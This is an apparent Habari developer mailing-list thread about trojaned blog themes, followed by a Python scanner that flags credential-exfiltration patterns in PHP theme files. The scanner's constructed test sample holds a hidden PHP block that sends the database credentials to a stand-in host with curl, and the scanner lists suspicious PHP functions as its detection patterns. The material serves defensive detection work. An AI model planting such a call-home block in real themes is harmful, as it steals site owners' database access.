What about an encrypted approved badge to put on 3rd party sites that links back to a page (wiki?) only editable by certain people.
---
Amanda Moore
Sent from my iPhone

On Feb 4, 2011, at 6:02 PM, Chris Meller <[email protected]> wrote:

> This was discussed on the private list after it was forwarded to
> [email protected] and the consensus is that this is just something we have to
> deal with. Themes containing malware and exploits have become an increasingly
> popular offering on sites advertising free blog themes, but as long as you
> allow any type of scripting access (whether it be raw PHP or a
> pseudo-language like Smarty) there is not much that can be done - the
> potential for foul play will always exist.
>
> The same level of care and suspicion should apply when downloading a theme or
> plugin as when downloading anything else from the internet. Users should be
> encouraged to use addons from reputable locations like the -extras
> repository, where there is at least some additional visibility for
> contributions, and always be wary of any third-party sites.
>
>
> On Feb 4, 2011, at 12:21 AM, Matt-SD wrote:
>
>> Say I build a theme.
>>
>> Theme.xml contains legitimate stuff, but index.php (and perhaps the
>> other files) contain some less-than-good stuff under the hood.
>>
>> It looks like an acceptable theme when you see the screenshot & when
>> you download it, you activate it & look at your theme to marvel at its
>> greatness. BUT: somewhere hidden in the theme is this little gem:
>>
>> <?php
>> $str = Config::get('db_connection');
>> ** Insert cross-site scripting here **
>> ?>
>>
>> Now your database info has been sent to another site & anybody who
>> reads it on that other site can get into your database & mess around
>> in it.
>>
>> --
>> To post to this group, send email to [email protected]
>> To unsubscribe from this group, send email to
>> [email protected]
>> For more options, visit this group at
>> http://groups.google.com/group/habari-dev
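An added example, not code from this thread or from the Habari project: a small Python triage scanner for the pattern Matt-SD describes, a theme file that reads `Config::get('db_connection')` (the call named in the thread) and also opens an outbound connection. The two sample themes it scans are constructed inline for the example; the pattern list (curl_init, fsockopen, eval, base64_decode, remote include, and so on) is my own heuristic and assumes raw-PHP themes. It is a first-pass check before activating a theme from an unknown site, not a guarantee: as Chris points out, once a theme can run code it can also obfuscate that code past any such list.

```python
"""Heuristic triage of a theme directory for the credential-exfiltration
pattern discussed in the thread.  Added example; not Habari project code.
All sample theme content below is constructed for this example."""
import os
import re
import tempfile
from collections import namedtuple

Finding = namedtuple("Finding", "path lineno tag text")

# Heuristic patterns (assumption: raw-PHP themes).  Only the first one is
# taken from the thread; the rest are generic PHP primitives a theme has
# no legitimate reason to use.
SUSPICIOUS = {
    "reads_db_config": re.compile(r"Config::get\(\s*['\"]db_connection['\"]\s*\)"),
    "outbound_http": re.compile(
        r"\b(?:curl_init|fsockopen|stream_socket_client)\s*\("
        r"|file_get_contents\(\s*['\"]https?://"),
    "eval_or_obfuscation": re.compile(
        r"\b(?:eval|base64_decode|gzinflate|str_rot13|create_function)\s*\("),
    "remote_include": re.compile(
        r"\b(?:include|require)(?:_once)?\s*\(?\s*['\"]https?://"),
}


def scan_theme(root):
    """Walk a theme directory; return every suspicious line in PHP files."""
    findings = []
    for dirpath, _dirs, files in sorted(os.walk(root), key=lambda t: t[0]):
        for name in sorted(files):
            if not name.endswith((".php", ".phtml", ".inc")):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                for lineno, line in enumerate(fh, 1):
                    for tag, pat in SUSPICIOUS.items():
                        if pat.search(line):
                            findings.append(Finding(path, lineno, tag, line.strip()))
    return findings


def verdict(findings):
    """Reading the DB config *and* talking to the network is the exfil shape."""
    tags = {f.tag for f in findings}
    if "reads_db_config" in tags and "outbound_http" in tags:
        return "likely-exfiltration"
    return "suspicious" if tags else "clean"


# Constructed sample templates.  The trojaned one fleshes out the
# "little gem" from the thread with a hypothetical curl call-home.
BENIGN_INDEX = """<?php
// constructed benign template: renders posts, touches nothing sensitive
foreach ($posts as $post) {
    echo '<h2>' . htmlspecialchars($post->title) . '</h2>';
}
?>
"""

TROJANED_INDEX = BENIGN_INDEX + """<?php
// constructed: hidden block shipping the DB credentials off-site
$str = Config::get('db_connection');
$ch = curl_init('http://collector.example.invalid/drop');
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($str));
curl_exec($ch);
?>
"""


def build_sample_theme(root, trojaned):
    """Write a two-file theme (theme.xml + index.php) under root."""
    os.makedirs(root, exist_ok=True)
    with open(os.path.join(root, "theme.xml"), "w") as fh:
        fh.write("<theme><name>Sample</name><version>1.0</version></theme>\n")
    with open(os.path.join(root, "index.php"), "w") as fh:
        fh.write(TROJANED_INDEX if trojaned else BENIGN_INDEX)
    return root


def demo():
    """Scan one benign and one trojaned theme; return both verdicts and hits."""
    with tempfile.TemporaryDirectory() as tmp:
        good = build_sample_theme(os.path.join(tmp, "good"), trojaned=False)
        bad = build_sample_theme(os.path.join(tmp, "bad"), trojaned=True)
        bad_findings = scan_theme(bad)
        return (verdict(scan_theme(good)), verdict(bad_findings),
                [(f.lineno, f.tag) for f in bad_findings])


if __name__ == "__main__":
    good_v, bad_v, hits = demo()
    print("benign theme:", good_v)
    print("trojaned theme:", bad_v)
    for lineno, tag in hits:
        print(f"  index.php:{lineno}: {tag}")
```

Run it on an unpacked theme directory by calling `scan_theme(path)` and `verdict(...)` on the result; anything other than "clean" deserves a read of the flagged lines before the theme is activated. Treat a "clean" verdict as "nothing obvious", since a theme that base64-encodes its payload inside an image-named file, or builds the function name at runtime, walks past this list.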
